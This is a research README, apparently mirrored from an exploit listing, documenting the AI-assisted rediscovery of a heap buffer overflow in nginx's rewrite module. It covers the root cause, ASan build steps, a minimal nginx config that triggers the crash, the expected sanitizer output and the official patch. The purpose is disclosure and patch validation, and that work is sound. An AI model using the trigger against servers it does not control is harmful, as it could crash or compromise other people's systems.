Share
## https://sploitus.com/exploit?id=C954251A-D5DC-581F-99D7-C85DE9846EF2
# AI-Assisted Rediscovery of CVE-2026-42945 in nginx

This repository documents a reproducible AI-assisted vulnerability rediscovery experiment against nginx `ngx_http_rewrite_module`, later associated with CVE-2026-42945.

The experiment is intentionally narrow. The vulnerable file, `src/http/ngx_http_script.c`, was provided directly to the model for audit. This is not a claim that an AI system autonomously found the issue in the full nginx codebase from scratch.

## Summary

The audited bug is a heap buffer overflow caused by stale script-engine state in nginx rewrite processing.

At a high level:

1. A `rewrite` replacement containing `?` sets `e->is_args = 1`.
2. In the vulnerable code, `e->is_args` is not cleared after the rewrite finishes.
3. A later `set`, `if`, or rewrite expression that copies an unnamed regex capture, such as `$1`, can size the destination buffer as if the capture will be copied raw.
4. The write pass then sees stale `e->is_args = 1` and URI-escapes the capture.
5. Escaping can expand bytes such as spaces from one byte to three bytes, so the write pass exceeds the allocation computed by the length pass.

The local AddressSanitizer reproduction confirms a heap-buffer-overflow in:

```text
ngx_escape_uri
ngx_http_script_copy_capture_code
ngx_http_rewrite_handler
```

## What This Repository Contains

```text
.
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ LICENSE
โ”œโ”€โ”€ prompts/
โ”‚   โ”œโ”€โ”€ audit_prompt.md
โ”‚   โ””โ”€โ”€ poc_prompt.md
โ”œโ”€โ”€ poc/
โ”‚   โ”œโ”€โ”€ trigger.py
โ”‚   โ”œโ”€โ”€ nginx.conf
โ”‚   โ”œโ”€โ”€ reproduce.sh
โ”‚   โ””โ”€โ”€ expected_output.txt
โ”œโ”€โ”€ docs/
โ”‚   โ”œโ”€โ”€ technical-analysis.md
โ”‚   โ”œโ”€โ”€ vulnerability-breakdown.md
โ”‚   โ””โ”€โ”€ methodology.md
โ””โ”€โ”€ screenshots/
    โ””โ”€โ”€ asan-crash.png
```

## Reproduction

The PoC is designed for a local lab build of vulnerable nginx with AddressSanitizer enabled. It starts nginx on `127.0.0.1:18080`, sends a crafted request to a local server, and prints crash evidence.

### 1. Build vulnerable nginx with ASan

Use an affected nginx source tree. The experiment was validated against nginx `1.30.0` built with clang and ASan:

```sh
./auto/configure \
  --prefix=/tmp/nginx-asan-poc \
  --with-cc-opt='-O0 -g -fsanitize=address -fno-omit-frame-pointer' \
  --with-ld-opt='-fsanitize=address'

make -j"$(getconf _NPROCESSORS_ONLN 2>/dev/null || sysctl -n hw.ncpu)"
```

### 2. Run the PoC

From this repository:

```sh
NGINX_BIN=/path/to/vulnerable/nginx/objs/nginx ./poc/reproduce.sh
```

If this repository is placed directly inside the nginx source checkout used for validation, the script also finds `../../objs/nginx` automatically.

### 3. Expected result

A successful reproduction prints an ASan report similar to:

```text
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1
    #0 ngx_escape_uri ngx_string.c:1687
    #1 ngx_http_script_copy_capture_code ngx_http_script.c:1399
    #2 ngx_http_rewrite_handler ngx_http_rewrite_module.c:180
```

See [poc/expected_output.txt](poc/expected_output.txt).

![ASan crash screenshot](screenshots/asan-crash.png)

## Minimal Trigger Configuration

The nginx config used by the PoC is intentionally small:

```nginx
location / {
    rewrite ^(.*) /new?c=1;
    set $myvar $1;
    return 200 "$myvar\n";
}
```

The first rewrite sets `e->is_args` because the replacement contains `?`. The later `set` evaluates `$1` while that stale state is still present.

## Official Patch

The minimal patch resets the script engine's argument-state flag when a regex rewrite finishes:

```c
e->is_args = 0;
e->quote = 0;
```

In the source tree used for this experiment, the fix appears as commit:

```text
524977e7c534e87e5b55739fa74601c9f1102686
Rewrite: fixed escaping and possible buffer overrun
```

The key point is not the size of the patch, but the state invariant it restores: the length pass and the write pass must agree on whether captures are being copied as URI arguments.

## Experiment Transparency

This experiment used a frontier coding agent as an audit assistant. The prompt explicitly directed the model to focus on memory-safety issues in `src/http/ngx_http_script.c` and to pay close attention to two-pass length/write mismatches.

Important limitations:

- The vulnerable source file was provided directly.
- The audit prompt was highly targeted toward the bug class.
- The model had access to local repository history during validation.
- The result should be interpreted as guided rediscovery, not autonomous bug hunting.
- The PoC demonstrates crash/ASan evidence only; it is not a weaponized exploit.

The exact prompts are included in [prompts/audit_prompt.md](prompts/audit_prompt.md) and [prompts/poc_prompt.md](prompts/poc_prompt.md).

## Responsible Use

This repository is intended for defensive research, patch validation, and reproducibility. Run the PoC only against local lab instances you control.

## License

The documentation and PoC harness in this repository are released under the MIT License. nginx itself is not included and is governed by its own license.